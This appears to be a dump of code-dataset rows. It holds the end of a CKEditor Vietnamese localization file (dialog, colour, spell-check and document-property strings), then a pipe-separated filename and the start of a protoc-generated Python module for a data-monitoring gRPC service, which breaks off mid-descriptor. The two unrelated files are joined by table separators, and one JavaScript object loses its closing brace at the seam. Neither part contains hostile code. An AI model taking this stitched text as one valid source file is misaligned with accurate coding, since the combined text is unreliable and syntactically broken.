btnSetValue : 'Giá trị được chọn',
btnDelete : 'Nút xoá'
},
// Textarea Dialog.
textarea :
{
title : 'Thuộc tính vùng văn bản',
cols : 'Số cột',
rows : 'Số hàng'
},
// Text Field Dialog.
textfield :
{
title : 'Thuộc tính trường văn bản',
name : 'Tên',
value : 'Giá trị',
charWidth : 'Độ rộng của ký tự',
maxChars : 'Số ký tự tối đa',
type : 'Kiểu',
typeText : 'Ký tự',
typePass : 'Mật khẩu'
},
// Hidden Field Dialog.
hidden :
{
title : 'Thuộc tính trường ẩn',
name : 'Tên',
value : 'Giá trị'
},
// Image Dialog.
image :
{
title : 'Thuộc tính của ảnh',
titleButton : 'Thuộc tính nút của ảnh',
menu : 'Thuộc tính của ảnh',
infoTab : 'Thông tin của ảnh',
btnUpload : 'Tải lên máy chủ',
upload : 'Tải lên',
alt : 'Chú thích ảnh',
lockRatio : 'Giữ nguyên tỷ lệ',
resetSize : 'Kích thước gốc',
border : 'Đường viền',
hSpace : 'Khoảng đệm ngang',
vSpace : 'Khoảng đệm dọc',
alertUrl : 'Hãy đưa vào đường dẫn của ảnh',
linkTab : 'Tab liên kết',
button2Img : 'Bạn có muốn chuyển nút bấm bằng ảnh được chọn thành ảnh?',
img2Button : 'Bạn có muốn chuyển đổi ảnh được chọn thành nút bấm bằng ảnh?',
urlMissing : 'Thiếu đường dẫn hình ảnh',
validateBorder : 'Chiều rộng của đường viền phải là một số nguyên dương',
validateHSpace : 'Khoảng đệm ngang phải là một số nguyên dương',
validateVSpace : 'Khoảng đệm dọc phải là một số nguyên dương'
},
// Flash Dialog
flash :
{
properties : 'Thuộc tính Flash',
propertiesTab : 'Thuộc tính',
title : 'Thuộc tính Flash',
chkPlay : 'Tự động chạy',
chkLoop : 'Lặp',
chkMenu : 'Cho phép bật menu của Flash',
chkFull : 'Cho phép toàn màn hình',
scale : 'Tỷ lệ',
scaleAll : 'Hiển thị tất cả',
scaleNoBorder : 'Không đường viền',
scaleFit : 'Vừa vặn',
access : 'Truy cập mã',
accessAlways : 'Luôn luôn',
accessSameDomain: 'Cùng tên miền',
accessNever : 'Không bao giờ',
alignAbsBottom : 'Dưới tuyệt đối',
alignAbsMiddle : 'Giữa tuyệt đối',
alignBaseline : 'Đường cơ sở',
alignTextTop : 'Phía trên chữ',
quality : 'Chất lượng',
qualityBest : 'Tốt nhất',
qualityHigh : 'Cao',
qualityAutoHigh : 'Cao tự động',
qualityMedium : 'Trung bình',
qualityAutoLow : 'Thấp tự động',
qualityLow : 'Thấp',
windowModeWindow: 'Cửa sổ',
windowModeOpaque: 'Mờ đục',
windowModeTransparent : 'Trong suốt',
windowMode : 'Chế độ cửa sổ',
flashvars : 'Các biến số dành cho Flash',
bgcolor : 'Màu nền',
hSpace : 'Khoảng đệm ngang',
vSpace : 'Khoảng đệm dọc',
validateSrc : 'Hãy đưa vào đường dẫn liên kết',
validateHSpace : 'Khoảng đệm ngang phải là số nguyên.',
validateVSpace : 'Khoảng đệm dọc phải là số nguyên.'
},
// Speller Pages Dialog
spellCheck :
{
toolbar : 'Kiểm tra chính tả',
title : 'Kiểm tra chính tả',
notAvailable : 'Xin lỗi, dịch vụ này hiện tại không có.',
errorLoading : 'Lỗi khi đang nạp dịch vụ ứng dụng: %s.',
notInDic : 'Không có trong từ điển',
changeTo : 'Chuyển thành',
btnIgnore : 'Bỏ qua',
btnIgnoreAll : 'Bỏ qua tất cả',
btnReplace : 'Thay thế',
btnReplaceAll : 'Thay thế tất cả',
btnUndo : 'Phục hồi lại',
noSuggestions : '- Không đưa ra gợi ý về từ -',
progress : 'Đang tiến hành kiểm tra chính tả...',
noMispell : 'Hoàn tất kiểm tra chính tả: Không có lỗi chính tả',
noChanges : 'Hoàn tất kiểm tra chính tả: Không có từ nào được thay đổi',
oneChange : 'Hoàn tất kiểm tra chính tả: Một từ đã được thay đổi',
manyChanges : 'Hoàn tất kiểm tra chính tả: %1 từ đã được thay đổi',
ieSpellDownload : 'Chức năng kiểm tra chính tả chưa được cài đặt. Bạn có muốn tải về ngay bây giờ?'
},
smiley :
{
toolbar : 'Hình biểu lộ cảm xúc (mặt cười)',
title : 'Chèn hình biểu lộ cảm xúc (mặt cười)',
options : 'Tùy chọn hình biểu lộ cảm xúc'
},
elementsPath :
{
eleLabel : 'Nhãn thành phần',
eleTitle : '%1 thành phần'
},
numberedlist : 'Chèn/Xoá Danh sách có thứ tự',
bulletedlist : 'Chèn/Xoá Danh sách không thứ tự',
indent : 'Dịch vào trong',
outdent : 'Dịch ra ngoài',
justify :
{
left : 'Canh trái',
center : 'Canh giữa',
right : 'Canh phải',
block : 'Canh đều'
},
blockquote : 'Khối trích dẫn',
clipboard :
{
title : 'Dán',
cutError : 'Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh cắt. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+X).',
copyError : 'Các thiết lập bảo mật của trình duyệt không cho phép trình biên tập tự động thực thi lệnh sao chép. Hãy sử dụng bàn phím cho lệnh này (Ctrl/Cmd+C).',
pasteMsg : 'Hãy dán nội dung vào trong khung bên dưới, sử dụng tổ hợp phím (<STRONG>Ctrl/Cmd+V</STRONG>) và nhấn vào nút <STRONG>Đồng ý</STRONG>.',
securityMsg : 'Do thiết lập bảo mật của trình duyệt nên trình biên tập không thể truy cập trực tiếp vào nội dung đã sao chép. Bạn cần phải dán lại nội dung vào cửa sổ này.',
pasteArea : 'Khu vực dán'
},
pastefromword :
{
confirmCleanup : 'Văn bản bạn muốn dán có kèm định dạng của Word. Bạn có muốn loại bỏ định dạng Word trước khi dán?',
toolbar : 'Dán với định dạng Word',
title : 'Dán với định dạng Word',
error : 'Không thể để làm sạch các dữ liệu dán do một lỗi nội bộ'
| pasteText :
{
button : 'Dán theo định dạng văn bản thuần',
title : 'Dán theo định dạng văn bản thuần'
},
templates :
{
button : 'Mẫu dựng sẵn',
title : 'Nội dung Mẫu dựng sẵn',
options : 'Tùy chọn mẫu dựng sẵn',
insertOption : 'Thay thế nội dung hiện tại',
selectPromptMsg : 'Hãy chọn mẫu dựng sẵn để mở trong trình biên tập<br>(nội dung hiện tại sẽ bị mất):',
emptyListMsg : '(Không có mẫu dựng sẵn nào được định nghĩa)'
},
showBlocks : 'Hiển thị các khối',
stylesCombo :
{
label : 'Kiểu',
panelTitle : 'Phong cách định dạng',
panelTitle1 : 'Kiểu khối',
panelTitle2 : 'Kiểu trực tiếp',
panelTitle3 : 'Kiểu đối tượng'
},
format :
{
label : 'Định dạng',
panelTitle : 'Định dạng',
tag_p : 'Bình thường (P)',
tag_pre : 'Đã thiết lập',
tag_address : 'Address',
tag_h1 : 'Heading 1',
tag_h2 : 'Heading 2',
tag_h3 : 'Heading 3',
tag_h4 : 'Heading 4',
tag_h5 : 'Heading 5',
tag_h6 : 'Heading 6',
tag_div : 'Bình thường (DIV)'
},
div :
{
title : 'Tạo khối các thành phần',
toolbar : 'Tạo khối các thành phần',
cssClassInputLabel : 'Các lớp CSS',
styleSelectLabel : 'Kiểu (style)',
IdInputLabel : 'Định danh (id)',
languageCodeInputLabel : 'Mã ngôn ngữ',
inlineStyleInputLabel : 'Kiểu nội dòng',
advisoryTitleInputLabel : 'Nhan đề hướng dẫn',
langDirLabel : 'Hướng ngôn ngữ',
langDirLTRLabel : 'Trái sang phải (LTR)',
langDirRTLLabel : 'Phải qua trái (RTL)',
edit : 'Chỉnh sửa',
remove : 'Xóa bỏ'
},
iframe :
{
title : 'Thuộc tính iframe',
toolbar : 'Iframe',
noUrl : 'Vui lòng nhập địa chỉ iframe',
scrolling : 'Kích hoạt thanh cuộn',
border : 'Hiển thị viền khung'
},
font :
{
label : 'Phông',
voiceLabel : 'Phông',
panelTitle : 'Phông'
},
fontSize :
{
label : 'Cỡ chữ',
voiceLabel : 'Kích cỡ phông',
panelTitle : 'Cỡ chữ'
},
colorButton :
{
textColorTitle : 'Màu chữ',
bgColorTitle : 'Màu nền',
panelTitle : 'Màu sắc',
auto : 'Tự động',
more : 'Màu khác...'
},
colors :
{
'000' : 'Đen',
'800000' : 'Maroon',
'8B4513' : 'Saddle Brown',
'2F4F4F' : 'Dark Slate Gray',
'008080' : 'Teal',
'000080' : 'Navy',
'4B0082' : 'Indigo',
'696969' : 'Dark Gray',
'B22222' : 'Fire Brick',
'A52A2A' : 'Nâu',
'DAA520' : 'Golden Rod',
'006400' : 'Dark Green',
'40E0D0' : 'Turquoise',
'0000CD' : 'Medium Blue',
'800080' : 'Purple',
'808080' : 'Xám',
'F00' : 'Đỏ',
'FF8C00' : 'Dark Orange',
'FFD700' : 'Vàng',
'008000' : 'Xanh lá cây',
'0FF' : 'Cyan',
'00F' : 'Xanh da trời',
'EE82EE' : 'Tím',
'A9A9A9' : 'Xám tối',
'FFA07A' : 'Light Salmon',
'FFA500' : 'Màu cam',
'FFFF00' : 'Vàng',
'00FF00' : 'Lime',
'AFEEEE' : 'Pale Turquoise',
'ADD8E6' : 'Light Blue',
'DDA0DD' : 'Plum',
'D3D3D3' : 'Light Grey',
'FFF0F5' : 'Lavender Blush',
'FAEBD7' : 'Antique White',
'FFFFE0' : 'Light Yellow',
'F0FFF0' : 'Honeydew',
'F0FFFF' : 'Azure',
'F0F8FF' : 'Alice Blue',
'E6E6FA' : 'Lavender',
'FFF' : 'Trắng'
},
scayt :
{
title : 'Kiểm tra chính tả ngay khi gõ chữ (SCAYT)',
opera_title : 'Không hỗ trợ trên trình duyệt Opera',
enable : 'Bật SCAYT',
disable : 'Tắt SCAYT',
about : 'Thông tin về SCAYT',
toggle : 'Bật tắt SCAYT',
options : 'Tùy chọn',
langs : 'Ngôn ngữ',
moreSuggestions : 'Đề xuất thêm',
ignore : 'Bỏ qua',
ignoreAll : 'Bỏ qua tất cả',
addWord : 'Thêm từ',
emptyDic : 'Tên của từ điển không được để trống.',
optionsTab : 'Tùy chọn',
allCaps : 'Không phân biệt chữ HOA chữ thường',
ignoreDomainNames : 'Bỏ qua tên miền',
mixedCase : 'Không phân biệt loại chữ',
mixedWithDigits : 'Không phân biệt chữ và số',
languagesTab : 'Tab ngôn ngữ',
dictionariesTab : 'Từ điển',
dic_field_name : 'Tên từ điển',
dic_create : 'Tạo',
dic_restore : 'Phục hồi',
dic_delete : 'Xóa',
dic_rename : 'Thay tên',
dic_info : 'Ban đầu, từ điển người dùng được lưu trữ trong một cookie. Tuy nhiên, kích thước cookie bị giới hạn. Khi người sử dụng từ điển phát triển đến điểm không thể được lưu trữ trong cookie, từ điển sẽ được lưu trữ trên máy chủ của chúng tôi. Để lưu trữ từ điển cá nhân của bạn trên máy chủ của chúng tôi, bạn nên xác định một tên cho từ điển của bạn. Nếu bạn đã có một cuốn từ điển được lưu trữ, xin vui lòng gõ tên của nó và nhấn vào nút Khôi phục.',
aboutTab : 'Thông tin'
},
about :
{
title : 'Thông tin về CKEditor',
dlgTitle : 'Thông tin về CKEditor',
help : 'Kiểm tra $1 để được giúp đỡ.',
userGuide : 'Hướng dẫn sử dụng CKEditor',
moreInfo : 'Vui lòng ghé thăm trang web của chúng tôi để có thông tin về giấy phép:',
copy : 'Bản quyền © $1. Giữ toàn quyền.'
},
maximize : 'Phóng to tối đa',
minimize : 'Thu nhỏ',
fakeobjects :
{
anchor : 'Điểm neo',
flash : 'Flash',
iframe : 'IFrame',
hiddenfield : 'Trường ẩn',
unknown : 'Đối tượng không rõ ràng'
},
resize : 'Kéo rê để thay đổi kích cỡ',
colordialog :
{
title : 'Chọn màu',
options : 'Tùy chọn màu',
highlight : 'Màu chọn',
selected : 'Màu đã chọn',
clear : 'Xóa bỏ'
},
toolbarCollapse : 'Thu gọn thanh công cụ',
toolbarExpand : 'Mở rộng thnah công cụ',
toolbarGroups :
{
document : 'Tài liệu',
clipboard : 'Clipboard/Undo',
editing : 'Chỉnh sửa',
forms : 'Bảng biểu',
basicstyles : 'Kiểu cơ bản',
paragraph : 'Đoạn',
links : 'Liên kết',
insert : 'Chèn',
styles : 'Kiểu',
colors : 'Màu sắc',
tools : 'Công cụ'
},
bidi :
{
ltr : 'Văn bản hướng từ trái sang phải',
rtl : 'Văn bản hướng từ phải sang trái'
},
docprops :
{
label : 'Thuộc tính Tài liệu',
title : 'Thuộc tính Tài liệu',
design : 'Thiết kế',
meta : 'Siêu dữ liệu',
chooseColor : 'Chọn màu',
other : '<khác>',
docTitle : 'Tiêu đề Trang',
charset : 'Bảng mã ký tự',
charsetOther : 'Bảng mã ký tự khác',
charsetASCII : 'ASCII',
charsetCE : 'Trung Âu',
charsetCT : 'Tiếng Trung Quốc (Big5)',
charsetCR : 'Tiếng Kirin',
charsetGR : 'Tiếng Hy Lạp',
charsetJP : 'Tiếng Nhật',
charsetKR : 'Tiếng Hàn',
charsetTR : 'Tiếng Thổ Nhĩ Kỳ',
charsetUN : 'Unicode (UTF-8)',
charsetWE : 'Tây Âu',
docType : 'Kiểu Đề mục Tài liệu',
docTypeOther : 'Kiểu Đề mục Tài liệu khác',
xhtmlDec : 'Bao gồm cả định nghĩa XHTML',
bgColor : 'Màu nền',
bgImage : 'URL của Hình ảnh nền',
bgFixed : 'Không cuộn nền',
txtColor : 'Màu chữ',
margin : 'Đường biên của Trang',
marginTop : 'Trên',
marginLeft : 'Trái',
marginRight : 'Phải',
marginBottom : 'Dưới',
metaKeywords : 'Các từ khóa chỉ mục tài liệu (phân cách bởi dấu phẩy)',
metaDescription : 'Mô tả tài liệu',
metaAuthor : 'Tác giả',
metaCopyright : 'Bản quyền',
previewHtml : '<p>Đây là một số <strong>văn bản mẫu</strong>. Bạn đang sử dụng <a href="javascript:void(0)">CKEditor</a>.</p>'
}
}; | },
|
DataMonitoringService_pb2.py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: monitoring/DataMonitoringService.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from ..uac import Collaborator_pb2 as uac_dot_Collaborator__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='monitoring/DataMonitoringService.proto',
package='ai.verta.monitoring',
syntax='proto3',
serialized_options=b'P\001ZAgithub.com/VertaAI/modeldb/protos/gen/go/protos/public/monitoring',
serialized_pb=b'\n&monitoring/DataMonitoringService.proto\x12\x13\x61i.verta.monitoring\x1a\x16uac/Collaborator.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x1cgoogle/protobuf/struct.proto\"@\n\x08Profiler\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x03 \x01(\t\"~\n\x15\x43reateProfilerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x02 \x01(\t\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"]\n\x12GetProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"\x8a\x01\n\x15UpdateProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x1a\n\x12profiler_reference\x18\x03 \x01(\t\x1a;\n\x08Response\x12/\n\x08profiler\x18\x01 \x01(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"T\n\x14ListProfilersRequest\x1a<\n\x08Response\x12\x30\n\tprofilers\x18\x01 \x03(\x0b\x32\x1d.ai.verta.monitoring.Profiler\"/\n\x15\x44\x65leteProfilerRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a\n\n\x08Response\"d\n\x0f\x42uildStatusEnum\"Q\n\x0b\x42uildStatus\x12\r\n\tUNDEFINED\x10\x00\x12\x0c\n\x08\x42UILDING\x10\x01\x12\x0c\n\x08\x44\x45LETING\x10\x02\x12\t\n\x05\x45RROR\x10\x03\x12\x0c\n\x08\x46INISHED\x10\x04\"r\n\x10\x44\x65ployStatusEnum\"^\n\x0c\x44\x65ployStatus\x12\r\n\tUNDEFINED\x10\x00\x12\x0c\n\x08INACTIVE\x10\x01\x12\n\n\x06\x41\x43TIVE\x10\x02\x12\x0c\n\x08UPDATING\x10\x03\x12\x0c\n\x08\x43REATING\x10\x04\x12\t\n\x05\x45RROR\x10\x05\"\xd5\x01\n\x0eProfilerStatus\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x12\x46\n\x0c\x62uild_status\x18\x03 \x01(\x0e\x32\x30.ai.verta.monitoring.BuildStatusEnum.BuildStatus\x12I\n\rdeploy_status\x18\x04 \x01(\x0e\x32\x32.ai.verta.monitoring.DeployStatusEnum.DeployStatus\"\x8d\x01\n\x18GetProfilerStatusRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x88\x01\n&FindProfilersForMonitoredEntityRequest\x12\x1b\n\x13monitored_entity_id\x18\x01 \x01(\r\x1a\x41\n\x08Response\x12\x35\n\x08statuses\x18\x01 \x03(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x80\x01\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\t\x12%\n\x05value\x18\x02 \x01(\x0b\x32\x16.google.protobuf.Value\x12@\n\nvalue_type\x18\x03 \x01(\x0e\x32,.ai.verta.monitoring.ValueTypeEnum.ValueType\"H\n\rValueTypeEnum\"7\n\tValueType\x12\n\n\x06STRING\x10\x00\x12\n\n\x06NUMBER\x10\x01\x12\x08\n\x04LIST\x10\x02\x12\x08\n\x04\x42LOB\x10\x03\"\xbe\x01\n\x15\x45nableProfilerRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x12\x32\n\x0b\x65nvironment\x18\x03 \x03(\x0b\x32\x1d.ai.verta.monitoring.KeyValue\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\x8b\x01\n\x16\x44isableProfilerRequest\x12\x13\n\x0bprofiler_id\x18\x01 \x01(\r\x12\x1b\n\x13monitored_entity_id\x18\x02 \x01(\r\x1a?\n\x08Response\x12\x33\n\x06status\x18\x01 \x01(\x0b\x32#.ai.verta.monitoring.ProfilerStatus\"\xbc\x03\n\x0fMonitoredEntity\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x14\n\x0cworkspace_id\x18\x05 \x01(\x04\x12#\n\x1b\x63reated_at_timestamp_millis\x18\x06 \x01(\x04\x12#\n\x1bupdated_at_timestamp_millis\x18\x07 \x01(\x04\x12H\n\nattributes\x18\x08 \x03(\x0b\x32\x34.ai.verta.monitoring.MonitoredEntity.AttributesEntry\x12\r\n\x05owner\x18\t \x01(\t\x12=\n\x13resource_visibility\x18\n \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\x0b \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x12\x16\n\x0eversion_number\x18\x0c \x01(\x04\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01J\x04\x08\x03\x10\x04J\x04\x08\x04\x10\x05\"\xd9\x03\n\x1c\x43reateMonitoredEntityRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x16\n\x0cworkspace_id\x18\x04 \x01(\x04H\x00\x12\x18\n\x0eworkspace_name\x18\x05 \x01(\tH\x00\x12U\n\nattributes\x18\x06 \x03(\x0b\x32\x41.ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry\x12=\n\x13resource_visibility\x18\x07 \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\x08 \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1aJ\n\x08Response\x12>\n\x10monitored_entity\x18\x01 \x01(\x0b\x32$.ai.verta.monitoring.MonitoredEntityB\x16\n\x14workspace_identifierJ\x04\x08\x02\x10\x03J\x04\x08\x03\x10\x04\"\x95\x03\n\x1cUpdateMonitoredEntityRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x12\x0c\n\x04name\x18\x02 \x01(\t\x12U\n\nattributes\x18\x07 \x03(\x0b\x32\x41.ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry\x12=\n\x13resource_visibility\x18\x08 \x01(\x0e\x32 .ai.verta.uac.ResourceVisibility\x12@\n\x11\x63ustom_permission\x18\t \x01(\x0b\x32%.ai.verta.uac.CollaboratorPermissions\x1a\x31\n\x0f\x41ttributesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1aJ\n\x08Response\x12>\n\x10monitored_entity\x18\x01 \x01(\x0b\x32$.ai.verta.monitoring.MonitoredEntityJ\x04\x08\x04\x10\x07\"\xa5\x02\n\x1a\x46indMonitoredEntityRequest\x12\x0b\n\x03ids\x18\x01 \x03(\x04\x12\r\n\x05names\x18\x02 \x03(\t\x12\x13\n\x0b\x66uzzy_names\x18\x07 \x03(\t\x12\x16\n\x0cworkspace_id\x18\x03 \x01(\x04H\x00\x12\x18\n\x0eworkspace_name\x18\x06 \x01(\tH\x00\x12\x13\n\x0bpage_number\x18\x04 \x01(\x05\x12\x12\n\npage_limit\x18\x05 \x01(\x05\x1a\x63\n\x08Response\x12@\n\x12monitored_entities\x18\x01 \x03(\x0b\x32$.ai.verta.monitoring.MonitoredEntity\x12\x15\n\rtotal_records\x18\x02 \x01(\x05\x42\x16\n\x14workspace_identifier\"6\n\x1c\x44\x65leteMonitoredEntityRequest\x12\n\n\x02id\x18\x01 \x01(\x04\x1a\n\n\x08Response2\xd0\x13\n\x15\x44\x61taMonitoringService\x12\xcc\x01\n\x15\x63reateMonitoredEntity\x12\x31.ai.verta.monitoring.CreateMonitoredEntityRequest\x1a:.ai.verta.monitoring.CreateMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>\"9/api/v1/monitoring/monitored_entity/createMonitoredEntity:\x01*\x12\xcc\x01\n\x15updateMonitoredEntity\x12\x31.ai.verta.monitoring.UpdateMonitoredEntityRequest\x1a:.ai.verta.monitoring.UpdateMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>29/api/v1/monitoring/monitored_entity/updateMonitoredEntity:\x01*\x12\xc4\x01\n\x13\x66indMonitoredEntity\x12/.ai.verta.monitoring.FindMonitoredEntityRequest\x1a\x38.ai.verta.monitoring.FindMonitoredEntityRequest.Response\"B\x82\xd3\xe4\x93\x02<\"7/api/v1/monitoring/monitored_entity/findMonitoredEntity:\x01*\x12\xcc\x01\n\x15\x64\x65leteMonitoredEntity\x12\x31.ai.verta.monitoring.DeleteMonitoredEntityRequest\x1a:.ai.verta.monitoring.DeleteMonitoredEntityRequest.Response\"D\x82\xd3\xe4\x93\x02>*9/api/v1/monitoring/monitored_entity/deleteMonitoredEntity:\x01*\x12\xa1\x01\n\x0bgetProfiler\x12\'.ai.verta.monitoring.GetProfilerRequest\x1a\x30.ai.verta.monitoring.GetProfilerRequest.Response\"7\x82\xd3\xe4\x93\x02\x31\x12//api/v1/monitoring/monitored_entity/getProfiler\x12\xb0\x01\n\x0e\x63reateProfiler\x12*.ai.verta.monitoring.CreateProfilerRequest\x1a\x33.ai.verta.monitoring.CreateProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\"2/api/v1/monitoring/monitored_entity/createProfiler:\x01*\x12\xb0\x01\n\x0eupdateProfiler\x12*.ai.verta.monitoring.UpdateProfilerRequest\x1a\x33.ai.verta.monitoring.UpdateProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\x32\x32/api/v1/monitoring/monitored_entity/updateProfiler:\x01*\x12\xa9\x01\n\rlistProfilers\x12).ai.verta.monitoring.ListProfilersRequest\x1a\x32.ai.verta.monitoring.ListProfilersRequest.Response\"9\x82\xd3\xe4\x93\x02\x33\x12\x31/api/v1/monitoring/monitored_entity/listProfilers\x12\xaf\x01\n\x0e\x64\x65leteProfiler\x12*.ai.verta.monitoring.DeleteProfilerRequest\x1a\x33.ai.verta.monitoring.DeleteProfilerRequest.Response\"<\x82\xd3\xe4\x93\x02\x36*1/api/v1/monitoring/monitored_entity/deleteProfile:\x01*\x12\xb9\x01\n\x11getProfilerStatus\x12-.ai.verta.monitoring.GetProfilerStatusRequest\x1a\x36.ai.verta.monitoring.GetProfilerStatusRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\x12\x35/api/v1/monitoring/monitored_entity/getProfilerStatus\x12\xf4\x01\n\x1f\x66indProfilersForMonitoredEntity\x12;.ai.verta.monitoring.FindProfilersForMonitoredEntityRequest\x1a\x44.ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response\"N\x82\xd3\xe4\x93\x02H\"C/api/v1/monitoring/monitored_entity/findProfilersForMonitoredEntity:\x01*\x12\xb0\x01\n\x0e\x65nableProfiler\x12*.ai.verta.monitoring.EnableProfilerRequest\x1a\x33.ai.verta.monitoring.EnableProfilerRequest.Response\"=\x82\xd3\xe4\x93\x02\x37\"2/api/v1/monitoring/monitored_entity/enableProfiler:\x01*\x12\xb4\x01\n\x0f\x64isableProfiler\x12+.ai.verta.monitoring.DisableProfilerRequest\x1a\x34.ai.verta.monitoring.DisableProfilerRequest.Response\">\x82\xd3\xe4\x93\x02\x38\"3/api/v1/monitoring/monitored_entity/disableProfiler:\x01*BEP\x01ZAgithub.com/VertaAI/modeldb/protos/gen/go/protos/public/monitoringb\x06proto3'
,
dependencies=[uac_dot_Collaborator__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,])
_BUILDSTATUSENUM_BUILDSTATUS = _descriptor.EnumDescriptor(
name='BuildStatus',
full_name='ai.verta.monitoring.BuildStatusEnum.BuildStatus',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNDEFINED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUILDING', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETING', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINISHED', index=4, number=4,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=731,
serialized_end=812,
)
_sym_db.RegisterEnumDescriptor(_BUILDSTATUSENUM_BUILDSTATUS)
_DEPLOYSTATUSENUM_DEPLOYSTATUS = _descriptor.EnumDescriptor(
name='DeployStatus',
full_name='ai.verta.monitoring.DeployStatusEnum.DeployStatus',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNDEFINED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INACTIVE', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACTIVE', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UPDATING', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATING', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=5, number=5,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=834,
serialized_end=928,
)
_sym_db.RegisterEnumDescriptor(_DEPLOYSTATUSENUM_DEPLOYSTATUS)
_VALUETYPEENUM_VALUETYPE = _descriptor.EnumDescriptor(
name='ValueType',
full_name='ai.verta.monitoring.ValueTypeEnum.ValueType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='STRING', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NUMBER', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LIST', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BLOB', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1577,
serialized_end=1632,
)
_sym_db.RegisterEnumDescriptor(_VALUETYPEENUM_VALUETYPE)
_PROFILER = _descriptor.Descriptor(
name='Profiler',
full_name='ai.verta.monitoring.Profiler',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.Profiler.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.Profiler.name', index=1,
number=2, type=9, cpp_type=9, label=1,
